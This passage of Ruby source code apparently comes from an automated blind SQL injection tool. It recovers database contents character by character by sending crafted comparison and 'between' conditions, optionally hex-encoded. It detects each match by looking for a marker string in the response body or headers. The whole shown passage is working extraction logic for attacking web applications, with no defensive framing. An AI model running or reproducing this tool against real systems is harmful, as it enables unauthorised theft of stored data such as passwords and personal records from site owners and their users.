				end
			else
				if $hex == "y"
					configreq(" between" + " 0x" + "n".unpack('H*')[0] + " and " + "0x" + "s".unpack('H*')[0])
				else
					configreq("between" + $oh + "n" + $oh + "and" + $oh + "s")
				end
				sendreq()
				send2ndreq() if $secfile != ""
				$fheader = "n"
				$response.to_hash.each { |k,v|
					$fheader = "y" if k.to_s.include?($search)
					$fheader = "y" if v.to_s.include?($search)
				}
				if $response.body.include?($search) || $fheader == "y"
					if $hex == "y"
						configreq(" between" + " 0x" + "n".unpack('H*')[0] + " and " + "0x" + "p".unpack('H*')[0])
					else
						configreq("between" + $oh + "n" + $oh + "and" + $oh + "p")
					end
					sendreq()
					send2ndreq() if $secfile != ""
					$fheader = "n"
					$response.to_hash.each { |k,v|
						$fheader = "y" if k.to_s.include?($search)
						$fheader = "y" if v.to_s.include?($search)
					}
					if $response.body.include?($search) || $fheader == "y"
						for ch in $arr5
							if $hex == "y"
								configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0])
							else
								configreq("between" + $oh + ch + $oh + "and" + $oh + ch)
							end
							sendreq()
							send2ndreq() if $secfile != ""
							$fheader = "n"
							$response.to_hash.each { |k,v|
								$fheader = "y" if k.to_s.include?($search)
								$fheader = "y" if v.to_s.include?($search)
							}
							if $response.body.include?($search) || $fheader == "y"
								$result = $result + ch
		    	      			              	puts "Letter " + $i.to_s + " found: " + ch
								found = 1
				   	                    	break
							end
						end
					else
						for ch in $arr6
							if $hex == "y"
								configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0])
							else
								configreq("between" + $oh + ch + $oh + "and" + $oh + ch)
							end
							sendreq()
							send2ndreq() if $secfile != ""
							$fheader = "n"
							$response.to_hash.each { |k,v|
								$fheader = "y" if k.to_s.include?($search)
								$fheader = "y" if v.to_s.include?($search)
							}
							if $response.body.include?($search) || $fheader == "y"
								$result = $result + ch
		    	      			              	puts "Letter " + $i.to_s + " found: " + ch
								found = 1
				   	                    	break
							end
						end
					end
				else
					if $hex == "y"
						configreq(" between" + " 0x" + "t".unpack('H*')[0] + " and " + "0x" + "v".unpack('H*')[0])
					else
						configreq("between" + $oh + "t" + $oh + "and" + $oh + "v")
					end
					sendreq()
					send2ndreq() if $secfile != ""
					$fheader = "n"
					$response.to_hash.each { |k,v|
						$fheader = "y" if k.to_s.include?($search)
						$fheader = "y" if v.to_s.include?($search)
					}
					if $response.body.include?($search) || $fheader == "y"
						for ch in $arr7
							if $hex == "y"
								configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0])
							else
								configreq("between" + $oh + ch + $oh + "and" + $oh + ch)
							end
							sendreq()
							send2ndreq() if $secfile != ""
							$fheader = "n"
							$response.to_hash.each { |k,v|
								$fheader = "y" if k.to_s.include?($search)
								$fheader = "y" if v.to_s.include?($search)
							}
							if $response.body.include?($search) || $fheader == "y"
								$result = $result + ch
		    	      			              	puts "Letter " + $i.to_s + " found: " + ch
								found = 1
				   	                    	break
							end
						end
					else
						for ch in $arr8
							if $hex == "y"
								configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0])
							else
								configreq("between" + $oh + ch + $oh + "and" + $oh + ch)
							end
							sendreq()
							send2ndreq() if $secfile != ""
							$fheader = "n"
							$response.to_hash.each { |k,v|
								$fheader = "y" if k.to_s.include?($search)
								$fheader = "y" if v.to_s.include?($search)
							}
							if $response.body.include?($search) || $fheader == "y"
								$result = $result + ch
		    	      			              	puts "Letter " + $i.to_s + " found: " + ch
								found = 1
				   	                    	break
							end
						end
					end
				end
			end
		end

		# uppercase - only when case-sensitive specified
		if $case == "y" && found == 0
			if $hex == "y"
				configreq(" between" + " 0x" + "A".unpack('H*')[0] + " and " + "0x" + "Z".unpack('H*')[0])
			else
				configreq("between" + $oh + "A" + $oh + "and" + $oh + "Z")
			end
			sendreq()
			send2ndreq() if $secfile != ""
			$fheader = "n"
			$response.to_hash.each { |k,v|
				$fheader = "y" if k.to_s.include?($search)
				$fheader = "y" if v.to_s.include?($search)
			}
			if $response.body.include?($search) || $fheader == "y"
				if $hex == "y"
					configreq(" between" + " 0x" + "A".unpack('H*')[0] + " and " + "0x" + "M".unpack('H*')[0])
				else
					configreq("between" + $oh + "A" + $oh + "and" + $oh + "M")
				end
				sendreq()
				send2ndreq() if $secfile != ""
				$fheader = "n"
				$response.to_hash.each { |k,v|
					$fheader = "y" if k.to_s.include?($search)
					$fheader = "y" if v.to_s.include?($search)
				}
				if $response.body.include?($search) || $fheader == "y"
					if $hex == "y"
						configreq(" between" + " 0x" + "A".unpack('H*')[0] + " and " + "0x" + "F".unpack('H*')[0])
					else
						configreq("between" + $oh + "A" + $oh + "and" + $oh + "F")
					end
					sendreq()
					send2ndreq() if $secfile != ""
					$fheader = "n"
					$response.to_hash.each { |k,v|
						$fheader = "y" if k.to_s.include?($search)
						$fheader = "y" if v.to_s.include?($search)
					}
					if $response.body.include?($search) || $fheader == "y"
						if $hex == "y"
							configreq(" between" + " 0x" + "A".unpack('H*')[0] + " and " + "0x" + "C".unpack('H*')[0])
						else
							configreq("between" + $oh + "A" + $oh + "and" + $oh + "C")
						end
						sendreq()
						send2ndreq() if $secfile != ""
						$fheader = "n"
						$response.to_hash.each { |k,v|
							$fheader = "y" if k.to_s.include?($search)
							$fheader = "y" if v.to_s.include?($search)
						}
						if $response.body.include?($search) || $fheader == "y"
							for ch in $arr9
								if $hex == "y"
									configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0])
								else
									configreq("between" + $oh + ch + $oh + "and" + $oh + ch)
								end
								sendreq()
								send2ndreq() if $secfile != ""
								$fheader = "n"
								$response.to_hash.each { |k,v|
									$fheader = "y" if k.to_s.include?($search)
									$fheader = "y" if v.to_s.include?($search)
								}
								if $response.body.include?($search) || $fheader == "y"
									$result = $result + ch
			    	      			              	puts "Letter " + $i.to_s + " found: " + ch
									found = 1
					   	                    	break
								end
							end
						else
							for ch in $arr10
								if $hex == "y"
									configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0])
								else
									configreq("between" + $oh + ch + $oh + "and" + $oh + ch)
								end
								sendreq()
								send2ndreq() if $secfile != ""
								$fheader = "n"
								$response.to_hash.each { |k,v|
									$fheader = "y" if k.to_s.include?($search)
									$fheader = "y" if v.to_s.include?($search)
								}
								if $response.body.include?($search) || $fheader == "y"
									$result = $result + ch
			    	      			              	puts "Letter " + $i.to_s + " found: " + ch
									found = 1
					   	                    	break
								end
							end
						end
					else
						if $hex == "y"
							configreq(" between" + " 0x" + "G".unpack('H*')[0] + " and " + "0x" + "I".unpack('H*')[0])
						else
							configreq("between" + $oh + "G" + $oh + "and" + $oh + "I")
						end
						sendreq()
						send2ndreq() if $secfile != ""
						$fheader = "n"
						$response.to_hash.each { |k,v|
							$fheader = "y" if k.to_s.include?($search)
							$fheader = "y" if v.to_s.include?($search)
						}
						if $response.body.include?($search) || $fheader == "y"
							for ch in $arr11
								if $hex == "y"
									configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0])
								else
									configreq("between" + $oh + ch + $oh + "and" + $oh + ch)
								end
								sendreq()
								send2ndreq() if $secfile != ""
								$fheader = "n"
								$response.to_hash.each { |k,v|
									$fheader = "y" if k.to_s.include?($search)
									$fheader = "y" if v.to_s.include?($search)
								}
								if $response.body.include?($search) || $fheader == "y"
									$result = $result + ch
			    	      			              	puts "Letter " + $i.to_s + " found: " + ch
									found = 1
					   	                    	break
								end
							end
						else
							for ch in $arr12
								if $hex == "y"
									configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0])
								else
									configreq("between" + $oh + ch + $oh + "and" + $oh + ch)
								end
								sendreq()
								send2ndreq() if $secfile != ""
								$fheader = "n"
								$response.to_hash.each { |k,v|
									$fheader = "y" if k.to_s.include?($search)
									$fheader = "y" if v.to_s.include?($search)
								}
								if $response.body.include?($search) || $fheader == "y"
									$result = $result + ch
			    	      			              	puts "Letter " + $i.to_s + " found: " + ch
									found = 1
					   	                    	break
								end
							end
						end
					end
				else
					if $hex == "y"
						configreq(" between" + " 0x" + "N".unpack('H*')[0] + " and " + "0x" + "S".unpack('H*')[0])
					else
						configreq("between" + $oh + "N" + $oh + "and" + $oh + "S")
					end
					sendreq()
					send2ndreq() if $secfile != ""
					$fheader = "n"
					$response.to_hash.each { |k,v|
						$fheader = "y" if k.to_s.include?($search)
						$fheader = "y" if v.to_s.include?($search)
					}
					if $response.body.include?($search) || $fheader == "y"
						if $hex == "y"
							configreq(" between" + " 0x" + "N".unpack('H*')[0] + " and " + "0x" + "P".unpack('H*')[0])
						else
							configreq("between" + $oh + "N" + $oh + "and" + $oh + "P")
						end
						sendreq()
						send2ndreq() if $secfile != ""
						$fheader = "n"
						$response.to_hash.each { |k,v|
							$fheader = "y" if k.to_s.include?($search)
							$fheader = "y" if v.to_s.include?($search)
						}
						if $response.body.include?($search) || $fheader == "y"
							for ch in $arr13
								if $hex == "y"
									configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0])
								else
									configreq("between" + $oh + ch + $oh + "and" + $oh + ch)
								end
								sendreq()
								send2ndreq() if $secfile != ""
								$fheader = "n"
								$response.to_hash.each { |k,v|
									$fheader = "y" if k.to_s.include?($search)
									$fheader = "y" if v.to_s.include?($search)
								}
								if $response.body.include?($search) || $fheader == "y"
									$result = $result + ch
			    	      			              	puts "Letter " + $i.to_s + " found: " + ch
									found = 1
					   	                    	break
								end
							end
						else
							for ch in $arr14
								if $hex == "y"
									configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0])
								else
									configreq("between" + $oh + ch + $oh + "and" + $oh + ch)
								end
								sendreq()
								send2ndreq() if $secfile != ""
								$fheader = "n"
								$response.to_hash.each { |k,v|
									$fheader = "y" if k.to_s.include?($search)
									$fheader = "y" if v.to_s.include?($search)
								}
								if $response.body.include?($search) || $fheader == "y"
									$result = $result + ch
			    	      			              	puts "Letter " + $i.to_s + " found: " + ch
									found = 1
					   	                    	break
								end
							end
						end
					else
						if $hex == "y"
							configreq(" between" + " 0x" + "T".unpack('H*')[0] + " and " + "0x" + "V".unpack('H*')[0])
						else
							configreq("between" + $oh + "T" + $oh + "and" + $oh + "V")
						end
						sendreq()
						send2ndreq() if $secfile != ""
						$fheader = "n"
						$response.to_hash.each { |k,v|
							$fheader = "y" if k.to_s.include?($search)
							$fheader = "y" if v.to_s.include?($search)
						}
						if $response.body.include?($search) || $fheader == "y"
							for ch in $arr15
								if $hex == "y"
									configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0])
								else
									configreq("between" + $oh + ch + $oh + "and" + $oh + ch)
								end
								sendreq()
								send2ndreq() if $secfile != ""
								$fheader = "n"
								$response.to_hash.each { |k,v|
									$fheader = "y" if k.to_s.include?($search)
									$fheader = "y" if v.to_s.include?($search)
								}
								if $response.body.include?($search) || $fheader == "y"
									$result = $result + ch
			    	      			              	puts "Letter " + $i.to_s + " found: " + ch
									found = 1
					   	                    	break
								end
							end
						else
							for ch in $arr16
								if $hex == "y"
									configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0])
								else
									configreq("between" + $oh + ch + $oh + "and" + $oh + ch)
								end
								sendreq()
								send2ndreq() if $secfile != ""
								$fheader = "n"
								$response.to_hash.each { |k,v|
									$fheader = "y" if k.to_s.include?($search)
									$fheader = "y" if v.to_s.include?($search)
								}
								if $response.body.include?($search) || $fheader == "y"
									$result = $result + ch
			    	      			              	puts "Letter " + $i.to_s + " found: " + ch
									found = 1
					   	                    	break
								end
							end
						end
					end
				end
			end
		end

		# numeric
		if found == 0
			if $hex == "y"
				configreq(" between" + " 0x" + "0".unpack('H*')[0] + " and " + "0x" + "9".unpack('H*')[0])
			else
				configreq("between" + $oh + "0" + $oh + "and" + $oh + "9")
			end
			sendreq()
			send2ndreq() if $secfile != ""
			$fheader = "n"
			$response.to_hash.each { |k,v|
				$fheader = "y" if k.to_s.include?($search)
				$fheader = "y" if v.to_s.include?($search)
			}
			if $response.body.include?($search) || $fheader == "y"
				if $hex == "y"
					configreq(" between" + " 0x" + "0".unpack('H*')[0] + " and " + "0x" + "4".unpack('H*')[0])
				else
					configreq("between" + $oh + "0" + $oh + "and" + $oh + "4")
				end
				sendreq()
				send2ndreq() if $secfile != ""
				$fheader = "n"
				$response.to_hash.each { |k,v|
					$fheader = "y" if k.to_s.include?($search)
					$fheader = "y" if v.to_s.include?($search)
				}
				if $response.body.include?($search) || $fheader == "y"
					for ch in $arrn1
						if $hex == "y"
							configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0])
						else
							configreq("between" + $oh + ch + $oh + "and" + $oh + ch)
						end
						sendreq()
						send2ndreq() if $secfile != ""
						$fheader = "n"
						$response.to_hash.each { |k,v|
							$fheader = "y" if k.to_s.include?($search)
							$fheader = "y" if v.to_s.include?($search)
						}
						if $response.body.include?($search) || $fheader == "y"
							$result = $result + ch
	    	      			              	puts "Letter " + $i.to_s + " found: " + ch
							found = 1
			   	                    	break
						end
					end
				else
					for ch in $arrn2
						if $hex == "y"
							configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0])
						else
							configreq("between" + $oh + ch + $oh + "and" + $oh + ch)
						end
						sendreq()
						send2ndreq() if $secfile != ""
						$fheader = "n"
						$response.to_hash.each { |k,v|
							$fheader = "y" if k.to_s.include?($search)
							$fheader = "y" if v.to_s.include?($search)
						}
						if $response.body.include?($search) || $fheader == "y"
							$result = $result + ch
		      			              	puts "Letter " + $i.to_s + " found: " + ch
							found = 1
			   	                    	break
						end
					end
				end
			end
		end

		# special character
		if found == 0
			for ch in $arrs
				if $hex == "y"
					configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0])
				else
					configreq("between" + $oh + ch + $oh + "and" + $oh + ch)
				end
				sendreq()
				send2ndreq() if $secfile != ""
				$fheader = "n"
				$response.to_hash.each { |k,v|
					$fheader = "y" if k.to_s.include?($search)
					$fheader = "y" if v.to_s.include?($search)
				}
				if $response.body.include?($search) || $fheader == "y"
					$result = $result + ch
			      	       	puts "Letter " + $i.to_s + " found: " + ch
					found = 1
			               	break
				end
			end
		end

	elsif $mode == "a"

		# lowercase
		if $hex == "y"
			configreq(">=" + " 0x" + "a".unpack('H*')[0])
		else
			configreq(">=" + $oh + "a")
		end
		sendreq()
		send2ndreq() if $secfile != ""
		$fheader = "n"
		$response.to_hash.each { |k,v|
			$fheader = "y" if k.to_s.include?($search)
			$fheader = "y" if v.to_s.include?($search)
		}
		if $response.body.include?($search) || $fheader == "y"
			if $hex == "y"
				configreq("<=" + " 0x" + "m".unpack('H*')[0])
			else
				configreq("<=" + $oh + "m")
			end
			sendreq()
			send2ndreq() if $secfile != ""
			$fheader = "n"
			$response.to_hash.each { |k,v|
				$fheader = "y" if k.to_s.include?($search)
				$fheader = "y" if v.to_s.include?($search)
			}
			if $response.body.include?($search) || $fheader == "y"
				if $hex == "y"
					configreq("<=" + " 0x" + "f".unpack('H*')[0])
				else
					configreq("<=" + $oh + "f")
				end
				sendreq()
				send2ndreq() if $secfile != ""
				$fheader = "n"
				$response.to_hash.each { |k,v|
					$fheader = "y" if k.to_s.include?($search)
					$fheader = "y" if v.to_s.include?($search)
				}
				if $response.body.include?($search) || $fheader == "y"
					if $hex == "y"
						configreq("<=" + " 0x" + "c".unpack('H*')[0])
					else
						configreq("<=" + $oh + "c")
					end
					sendreq()
					send2ndreq() if $secfile != ""
					$fheader = "n"
					$response.to_hash.each { |k,v|
						$fheader = "y" if k.to_s.include?($search)
						$fheader = "y" if v.to_s.include?($search)
					}
					if $response.body.include?($search) || $fheader == "y"
						for ch in $arr1
							if $hex == "y"
								configreq("=" + "0x" + ch.unpack('H*')[0])
							else
								configreq("=" + $oh + ch)
							end
							sendreq()
							send2ndreq() if $secfile != ""
							$fheader = "n"
							$response.to_hash.each { |k,v|
								$fheader = "y" if k.to_s.include?($search)
								$fheader = "y" if v.to_s.include?($search)
							}
							if $response.body.include?($search) || $fheader == "y"
								$result = $result + ch
		    	      			              	puts "Letter " + $i.to_s + " found: " + ch
								found = 1
				   	                    	break
							end
						end
					else
						for ch in $arr2
							if $hex == "y"
								configreq("=" + "0x" + ch.unpack('H*')[0])
							else
								configreq("=" + $oh + ch)
							end
							sendreq()
							send2ndreq() if $secfile != ""
							$fheader = "n"
							$response.to_hash.each { |k,v|
								$fheader = "y" if k.to_s.include?($search)
								$fheader = "y" if v.to_s.include?($search)
							}
							if $response.body.include?($search) || $fheader == "y"
								$result = $result + ch
		    	      			              	puts "Letter " + $i.to_s + " found: " + ch
								found = 1
				   	                    	break
							end
						end
					end
				else
					if $hex == "y"
						configreq("<=" + " 0x" + "i".unpack('H*')[0])
					else
						configreq("<=" + $oh + "i")
					end
					sendreq()
					send2ndreq() if $secfile != ""
					$fheader = "n"
					$response.to_hash.each { |k,v|
						$fheader = "y" if k.to_s.include?($search)
						$fheader = "y" if v.to_s.include?($search)
					}
					if $response.body.include?($search) || $fheader == "y"
						for ch in $arr3
							if $hex == "y"
								configreq("=" + "0x" + ch.unpack('H*')[0])
							else
								configreq("=" + $oh + ch)
							end
							sendreq()
							send2ndreq() if $secfile != ""
							$fheader = "n"
							$response.to_hash.each { |k,v|
								$fheader = "y" if k.to_s.include?($search)
								$fheader = "y" if v.to_s.include?($search)
							}
							if $response.body.include?($search) || $fheader == "y"
								$result = $result + ch
		    	      			              	puts "Letter " + $i.to_s + " found: " + ch
								found = 1
				   	                    	break
							end
						end
					else
						for ch in $arr4
							if $hex == "y"
								configreq("=" + "0x" + ch.unpack('H*')[0])
							else
								configreq("=" + $oh + ch)
							end
							sendreq()
							send2ndreq() if $secfile != ""
							$fheader = "n"
							$response.to_hash.each { |k,v|
								$fheader = "y" if k.to_s.include?($search)
								$fheader = "y" if v.to_s.include?($search)
							}
							if $response.body.include?($search) || $fheader == "y"
								$result = $result + ch
		    	      			              	puts "Letter " + $i.to_s + " found: " + ch
								found = 1
				   	                    	break
							end
						end
					end
				end
			else
				if $hex == "y"
					configreq("<=" + " 0x" + "s".unpack('H*')[0])
				else
					configreq("<=" + $oh + "s")
				end
				sendreq()
				send2ndreq() if $secfile != ""
				$fheader = "n"
				$response.to_hash.each { |k,v|
					$fheader = "y" if k.to_s.include?($search)
					$fheader = "y" if v.to_s.include?($search)
				}
				if $response.body.include?($search) || $fheader == "y"
					if $hex == "y"
						configreq("<=" + " 0x" + "p".unpack('H*')[0])
					else
						configreq("<=" + $oh + "p")
					end
					sendreq()
					send2ndreq() if $secfile != ""
					$fheader = "n"
					$response.to_hash.each { |k,v|
						$fheader = "y" if k.to_s.include?($search)
						$fheader = "y" if v.to_s.include?($search)
					}
					if $response.body.include?($search) || $fheader == "y"
						for ch in $arr5
							if $hex == "y"
								configreq("=" + "0x" + ch.unpack('H*')[0])
							else
								configreq("=" + $oh + ch)
							end
							sendreq()
							send2ndreq() if $secfile != ""
							$fheader = "n"
							$response.to_hash.each { |k,v|
								$fheader = "y" if k.to_s.include?($search)
								$fheader = "y" if v.to_s.include?($search)
							}
							if $response.body.include?($search) || $fheader == "y"
								$result = $result + ch
		    	      			              	puts "Letter " + $i.to_s + " found: " + ch
								found = 1
				   	                    	break
							end
						end
					else
						for ch in $arr6
							if $hex == "y"
								configreq("=" + "0x" + ch.unpack('H*')[0])
							else
								configreq("=" + $oh + ch)
							end
							sendreq()
							send2ndreq() if $secfile != ""
							$fheader = "n"
							$response.to_hash.each { |k,v|
								$fheader = "y" if k.to_s.include?($search)
								$fheader = "y" if v.to_s.include?($search)
							}
							if $response.body.include?($search) || $fheader == "y"
								$result = $result + ch
		    	      			              	puts "Letter " + $i.to_s + " found: " + ch
								found = 1
				   	                    	break
							end
						end
					end
				else
					if $hex == "y"
						configreq("<=" + " 0x" + "v".unpack('H*')[0])
					else
						configreq("<=" + $oh + "v")
					end
					sendreq()
					send2ndreq() if $secfile != ""
					$fheader = "n"
					$response.to_hash.each { |k,v|
						$fheader = "y" if k.to_s.include?($search)
						$fheader = "y" if v.to_s.include?($search)
					}
					if $response.body.include?($search) || $fheader == "y"
						for ch in $arr7
							if $hex == "y"
								configreq("=" + "0x" + ch.unpack('H*')[0])
							else
								configreq("=" + $oh + ch)
							end
							sendreq()
							send2ndreq() if $secfile != ""
							$fheader = "n"
							$response.to_hash.each { |k,v|
								$fheader = "y" if k.to_s.include?($search)
								$fheader = "y" if v.to_s.include?($search)
							}
							if $response.body.include?($search) || $fheader == "y"
								$result = $result + ch
		    	      			              	puts "Letter " + $i.to_s + " found: " + ch
								found = 1
				   	                    	break
							end
						end
					else
						for ch in $arr8
							if $hex == "y"
								configreq("=" + "0x" + ch.unpack('H*')[0])
							else
								configreq("=" + $oh + ch)
							end
							sendreq()
							send2ndreq() if $secfile != ""
							$fheader = "n"
							$response.to_hash.each { |k,v|
								$fheader = "y" if k.to_s.include?($search)
								$fheader = "y" if v.to_s.include?($search)
							}
							if $response.body.include?($search) || $fheader == "y"
								$result = $result + ch
		    	      			              	puts "Letter " + $i.to_s + " found: " + ch
								found = 1
				   	                    	break
							end
						end
					end
				end
			end
		end

		# uppercase - only when case-sensitive specified
		if $case == "y" && found == 0
			if $hex == "y"
				configreq(">=" + " 0x" + "A".unpack('H*')[0])
			else
				configreq(">=" + $oh + "A")
			end
			sendreq()
			send2ndreq() if $secfile != ""
			$fheader = "n"
			$response.to_hash.each { |k,v|
				$fheader = "y" if k.to_s.include?($search)
				$fheader = "y" if v.to_s.include?($search)
			}
			if $response.body.include?($search) || $fheader == "y"
				if $hex == "y"
					configreq("<=" + " 0x" + "M".unpack('H*')[0])
				else
					configreq("<=" + $oh + "M")
				end
				sendreq()
				send2ndreq() if $secfile != ""
				$fheader = "n"
				$response.to_hash.each { |k,v|
					$fheader = "y" if k.to_s.include?($search)
					$fheader = "y" if v.to_s.include?($search)
				}
				if $response.body.include?($search) || $fheader == "y"
					if $hex == "y"
						configreq("<=" + " 0x" + "F".unpack('H*')[0])
					else
						configreq("<=" + $oh + "F")
					end
					sendreq()
					send2ndreq() if $secfile != ""
					$fheader = "n"
					$response.to_hash.each { |k,v|
						$fheader = "y" if k.to_s.include?($search)
						$fheader = "y" if v.to_s.include?($search)
					}
					if $response.body.include?($search) || $fheader == "y"
						if $hex == "y"
							configreq("<=" + " 0x" + "C".unpack('H*')[0])
						else
							configreq("<=" + $oh + "C")
						end
						sendreq()
						send2ndreq() if $secfile != ""
						$fheader = "n"
						$response.to_hash.each { |k,v|
							$fheader = "y" if k.to_s.include?($search)
							$fheader = "y" if v.to_s.include?($search)
						}
						if $response.body.include?($search) || $fheader == "y"
							for ch in $arr9
								if $hex == "y"
									configreq("=" + "0x" + ch.unpack('H*')[0])
								else
									configreq("=" + $oh + ch)
								end
								sendreq()
								send2ndreq() if $secfile != ""
								$fheader = "n"
								$response.to_hash.each { |k,v|
									$fheader = "y" if k.to_s.include?($search)
									$fheader = "y" if v.to_s.include?($search)
								}
								if $response.body.include?($search) || $fheader == "y"
									$result = $result + ch
			    	      			              	puts "Letter " + $i.to_s + " found: " + ch
									found = 1
					   	                    	break
								end
							end
						else
							for ch in $arr10
								if $hex == "y"
									configreq("=" + "0x" + ch.unpack('H*')[0])
								else
									configreq("=" + $oh + ch)
								end
								sendreq()
								send2ndreq() if $secfile != ""
								$fheader = "n"
								$response.to_hash.each { |k,v|
									$fheader = "y" if k.to_s.include?($search)
									$fheader = "y" if v.to_s.include?($search)
								}
								if $response.body.include?($search) || $fheader == "y"
									$result = $result + ch
			    	      			              	puts "Letter " + $i.to_s + " found: " + ch
									found = 1
					   	                    	break
								end
							end
						end
					else
						if $hex == "y"
							configreq("<=" + " 0x" + "I".unpack('H*')[0])
						else
							configreq("<=" + $oh + "I")
						end
						sendreq()
						send2ndreq() if $secfile != ""
						$fheader = "n"
						$response.to_hash.each { |k,v|
							$fheader = "y" if k.to_s.include?($search)
							$fheader = "y" if v.to_s.include?($search)
						}
						if $response.body.include?($search) || $fheader == "y"
							for ch in $arr11
								if $hex == "y"
									configreq("=" + "0x" + ch.unpack('H*')[0])
								else
									configreq("=" + $oh + ch)
								end
								sendreq()
								send2ndreq() if $secfile != ""
								$fheader = "n"
								$response.to_hash.each { |k,v|
									$fheader = "y" if k.to_s.include?($search)
									$fheader = "y" if v.to_s.include?($search)
								}
								if $response.body.include?($search) || $fheader == "y"
									$result = $result + ch
			    	      			              	puts "Letter " + $i.to_s + " found: " + ch
									found = 1
					   	                    	break
								end
							end
						else
							for ch in $arr12
								if $hex == "y"
									configreq("=" + "0x" + ch.unpack('H*')[0])
								else
									configreq("=" + $oh + ch)
								end
								sendreq()
								send2ndreq() if $secfile != ""
								$fheader = "n"
								$response.to_hash.each { |k,v|
									$fheader = "y" if k.to_s.include?($search)
									$fheader = "y" if v.to_s.include?($search)
								}
								if $response.body.include?($search) || $fheader == "y"
									$result = $result + ch
			    	      			              	puts "Letter " + $i.to_s + " found: " + ch
									found = 1
					   	                    	break
								end
							end
						end
					end
				else
					if $hex == "y"
						configreq("<=" + " 0x" + "S".unpack('H*')[0])
					else
						configreq("<=" + $oh + "S")
					end
					sendreq()
					send2ndreq() if $secfile != ""
					$fheader = "n"
					$response.to_hash.each { |k,v|
						$fheader = "y" if k.to_s.include?($search)
						$fheader = "y" if v.to_s.include?($search)
					}
					if $response.body.include?($search) || $fheader == "y"
						if $hex == "y"
							configreq("<=" + " 0x" + "P".unpack('H*')[0])
						else
							configreq("<=" + $oh + "P")
						end
						sendreq()
						send2ndreq() if $secfile != ""
						$fheader = "n"
						$response.to_hash.each { |k,v|
							$fheader = "y" if k.to_s.include?($search)
							$fheader = "y" if v.to_s.include?($search)
						}
						if $response.body.include?($search) || $fheader == "y"
							for ch in $arr13
								if $hex == "y"
									configreq("=" + "0x" + ch.unpack('H*')[0])
								else
									configreq("=" + $oh + ch)
								end
								sendreq()
								send2ndreq() if $secfile != ""
								$fheader = "n"
								$response.to_hash.each { |k,v|
									$fheader = "y" if k.to_s.include?($search)
									$fheader = "y" if v.to_s.include?($search)
								}
								if $response.body.include?($search) || $fheader == "y"
									$result = $result + ch
			    	      			              	puts "Letter " + $i.to_s + " found: " + ch
									found = 1
					   	                    	break
								end
							end
						else
							for ch in $arr14
								if $hex == "y"
									configreq("=" + "0x" + ch.unpack('H*')[0])
								else
									configreq("=" + $oh + ch)
								end
								sendreq()
								send2ndreq() if $secfile != ""
								$fheader = "n"
								$response.to_hash.each { |k,v|
									$fheader = "y" if k.to_s.include?($search)
									$fheader = "y" if v.to_s.include?($search)
								}
								if $response.body.include?($search) || $fheader == "y"
									$result = $result + ch
			    	      			              	puts "Letter " + $i.to_s + " found: " + ch
									found = 1
					   	                    	break
								end
							end
						end
					else
						if $hex == "y"
							configreq("<=" + " 0x" + "V".unpack('H*')[0])
						else
							configreq("<=" + $oh + "V")
						end
						sendreq()
						send2ndreq() if $secfile != ""
						$fheader = "n"
						$response.to_hash.each { |k,v|
							$fheader = "y" if k.to_s.include?($search)
							$fheader = "y" if v.to_s.include?($search)
						}
						if $response.body.include?($search) || $fheader == "y"
							for ch in $arr15
								if $hex == "y"
									configreq("=" + "0x" + ch.unpack('H*')[0])
								else
									configreq("=" + $oh + ch)
								end
								sendreq()
								send2ndreq() if $secfile != ""
								$fheader = "n"
								$response.to_hash.each { |k,v|
									$fheader = "y" if k.to_s.include?($search)
									$fheader = "y" if v.to_s.include?($search)
								}
								if $response.body.include?($search) || $fheader == "y"
									$result = $result + ch
			    	      			              	puts "Letter " + $i.to_s + " found: " + ch
									found = 1
					   	                    	break
								end
							end
						else
							for ch in $arr16
								if $hex == "y"
									configreq("=" + "0x" + ch.unpack('H*')[0])
								else
									configreq("=" + $oh + ch)
								end
								sendreq()
								send2ndreq() if $secfile != ""
								$fheader = "n"
								$response.to_hash.each { |k,v|
									$fheader = "y" if k.to_s.include?($search)
									$fheader = "y" if v.to_s.include?($search)
								}
								if $response.body.include?($search) || $fheader == "y"
									$result = $result + ch
			    	      			              	puts "Letter " + $i.to_s + " found: " + ch
									found = 1
					   	                    	break
								end
							end
						end
					end
				end
			end
		end

		# numeric
		if found == 0
			if $hex == "y"
				configreq(">=" + " 0x" + "0".unpack('H*')[0])
			else
				configreq(">=" + $oh + "0")
			end
			sendreq()
			send2ndreq() if $secfile != ""
			$fheader = "n"
			$response.to_hash.each { |k,v|
				$fheader = "y" if k.to_s.include?($search)
				$fheader = "y" if v.to_s.include?($search)
			}
			if $response.body.include?($search) || $fheader == "y"
				if $hex == "y"
					configreq("<=" + " 0x" + "4".unpack('H*')[0])
				else
					configreq("<=" + $oh + "4")
				end
				sendreq()
				send2ndreq() if $secfile != ""
				$fheader = "n"
				$response.to_hash.each { |k,v|
					$fheader = "y" if k.to_s.include?($search)
					$fheader = "y" if v.to_s.include?($search)
				}
				if $response.body.include?($search) || $fheader == "y"
					for ch in $arrn1
						if $hex == "y"
							configreq("=" + "0x" + ch.unpack('H*')[0])
						else
							configreq("=" + $oh + ch)
						end
						sendreq()
						send2ndreq() if $secfile != ""
						$fheader = "n"
						$response.to_hash.each { |k,v|
							$fheader = "y" if k.to_s.include?($search)
							$fheader = "y" if v.to_s.include?($search)
						}
						if $response.body.include?($search) || $fheader == "y"
							$result = $result + ch
	    	      			              	puts "Letter " + $i.to_s + " found: " + ch
							found = 1
